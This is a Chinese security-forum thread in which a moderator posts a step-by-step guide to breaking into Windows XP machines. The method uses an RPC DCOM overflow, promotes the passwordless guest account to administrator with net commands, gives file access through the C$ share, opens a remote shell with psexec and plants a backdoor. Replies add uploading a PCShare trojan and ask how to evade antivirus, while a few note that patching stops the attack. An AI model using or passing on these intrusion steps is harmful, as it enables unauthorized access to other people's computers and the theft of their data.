|
作者: abctm [abctm] 版主 | 登录 |
1.思路:突破xp系统远程访问的限制,实现文件传输和远程登陆。 2.工具:rpc漏洞扫描工具、溢出工具,pstools工具包。 3.步骤 1)步骤一:rpc漏洞扫描: 推荐使用retinarpcdcom.exe(eeye公司推出的专门针对RPC漏洞的扫描工具) 图形界面,在剑鹰网络安全小组有下载。 2)步骤二:远程溢出: 在剑鹰网络安全小组有很多该类工具下载,我用xp.exe,溢出成功率极高。 3)步骤三:提升guest权限(本方案之关键): 命令:net user guest /active:yes net localgroup aministrators guest /add ―――――――――――――――――――――――――――――― 看到这里,也许你会嗤之以鼻, 可这正是大家忽略的地方,因为guest有与其它所有帐号不同的特性。 如果你用net user guest命令,将会看到下面的内容: Password required No 这正是突破xp系统远程访问帐号限制的突破口! 除了guest外,其它帐号都是 Password required yes 所以就算你有xp系统的管理员帐号密码一样无所作为。 ―――――――――――――――――――――――――――――― 当guest提升为admin权限后,你试试 dir \\IP\c$ 呵呵,现在你已经有了读写权限,连ipc$连接都省了~~ 当然你也一样可以用net use \\ip "" /user:"guest"来进行IPC$连接 (不过是多此一举)。 到此,文件传输的问题已经解决! 4)步骤四:远程登陆 我们当然不想每次用溢出登陆对方。 那么就试试opentelnet吧 >opentelnet \\ip guest "" 1 90 read ntlm failed \\shit!用administrator也是这样子。 上传srv.exe试试,我没试过,有兴趣的自己试试。 因为我认为用psexec方便多了。命令如下: psexec \\ip cmd (连ipc$不用开了,爽吧) 5)关于后门: 各显神通,我正好用来试试榕哥的bits.dll,感觉一点都不好, 榕哥的fans可别拿鸡蛋扔我哦~~ 6)注意事项: 千万别在xp系统中建新帐户(为什么?自己想想) xp系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。 rpc溢出会导致对方重启,要慎用,尤其是服务器。 |
地主 发表时间: 10/26 14:04 |
回复: tommy_fool [tommy_fool] 论坛用户 | 登录 |
不错,谢谢提供:)down下来先 |
B1层 发表时间: 10/28 02:10 |
回复: topwbn [topwbn] 论坛用户 | 登录 |
呵呵。。双星兄。。我真服你了。。哪都能看见你的身影。。。 我不反对D版文章。。 但是我提个意见/。。能不能找点精彩的上来。。 |
B2层 发表时间: 10/28 20:19 |
回复: dupi [dupi] 论坛用户 | 登录 |
路过 看一下 不错 顶一下 |
B3层 发表时间: 10/29 13:10 |
回复: ck138168 [ck138168] 论坛用户 | 登录 |
很不错的!值得看看!!!! |
B4层 发表时间: 11/17 20:17 |
回复: newmyth21 [newmyth21] 论坛用户 | 登录 |
过得去吧。 |
B5层 发表时间: 11/24 17:32 |
回复: popmental [popmental] 论坛用户 | 登录 |
有一个问题XP能够作服务器吗?没有试过! |
B6层 发表时间: 12/04 12:44 |
回复: zhuyaping [zhuyaping] 论坛用户 | 登录 |
这个文章好像看到过了! |
B7层 发表时间: 12/07 17:52 |
回复: abctm [abctm] 版主 | 登录 |
欢迎来访 http://tm.k666.com ==================================== |
B8层 发表时间: 12/21 22:22 |
回复: lgf [lgf] 论坛用户 | 登录 |
顶一下吧~! |
B9层 发表时间: 03-12-23 13:09 |
回复: coki [coki] 论坛用户 | 登录 |
向各位学习 |
B10层 发表时间: 03-12-24 17:44 |
回复: lianjl [lianjl] 论坛用户 | 登录 |
我的思路与楼主颇似!但我溢出后是用tftpd32建立ftp服务器后,上传PCShare木马并运行,然后等待他们“自投罗网”。 |
B11层 发表时间: 03-12-27 17:31 |
回复: abctm [abctm] 版主 | 登录 |
|
B12层 发表时间: 04-01-06 12:48 |
回复: Greentea [napolun] 版主 | 登录 |
真是服了你,这里都敢自己顶自己的贴子。 |
B13层 发表时间: 04-01-08 22:57 |
回复: lho [lho] 论坛用户 | 登录 |
思路是不错的,但对于我们这些小菜来说,看不懂.比如第二步,怎么用那个XP.EXE远程溢出啊?这个工具哪里有啊,怎么用啊? |
B14层 发表时间: 04-01-13 00:00 |
回复: jfyygymtdh [jfyygymtdh] 论坛用户 | 登录 |
人家机子里的防火墙不就给你杀了吗?还有杀毒软件啊.你们都怎么样逃过他们的监视呢? |
B15层 发表时间: 04-01-13 18:26 |
回复: 2132 [dick83815] 论坛用户 | 登录 |
顶吧,随大流啊 |
B16层 发表时间: 04-01-16 12:55 |
回复: yueyue1 [yueyue1] 论坛用户 | 登录 |
多发表一些有关XP入侵的教程!毕竟现在多数人都用XP了! |
B17层 发表时间: 04-01-20 17:46 |
回复: k_com [k_com] 论坛用户 | 登录 |
xp.exe提供个好的下载好不 |
B18层 发表时间: 04-01-28 15:54 |
回复: k_com [k_com] 论坛用户 | 登录 |
还有~单词写错了`是administrators才对 |
B19层 发表时间: 04-01-28 16:02 |
回复: k_com [k_com] 论坛用户 | 登录 |
DOCM RPC EXPLOIT -GUI这工具我建议~~不错哦 |
B20层 发表时间: 04-01-28 16:08 |
回复: TGV_Mic [tgv] | 登录 |
问一句!!! 我要是打上 RPC 补丁,外加禁用 guest . 你还有办法嘛?????????????????????????? 建议下次贴这类文章时注明,在什么情况下是无稽之谈。(就是相应的对策,免得自己遭殃) [此贴被 TGV_Mic(tgv) 在 01月28日22时45分 编辑过] |
B21层 发表时间: 04-01-28 22:38 |
回复: k_com [k_com] 论坛用户 | 登录 |
同意楼上的~~打了补丁没有办法吧~~也不过是对付超级菜鸟的把戏 |
B22层 发表时间: 04-01-29 16:49 |
回复: putong [putong] 论坛用户 | 登录 |
我不打补丁把端口关啦或过滤端口怎么办 |
B23层 发表时间: 04-02-01 11:38 |
回复: abctm [abctm] 版主 | 登录 |
10/26 14:04 哪年的请看 那时冲击波正在流行 |
B24层 发表时间: 04-02-01 12:26 |
回复: k_com [k_com] 论坛用户 | 登录 |
呵呵~别怒啊~~别人把帖顶上来~我们看帖回帖啊 |
B25层 发表时间: 04-02-02 14:02 |
回复: fsqer [fsqer] 论坛用户 | 登录 |
顶! 这篇文章我在别的地方看过了! |
B26层 发表时间: 04-02-16 10:12 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号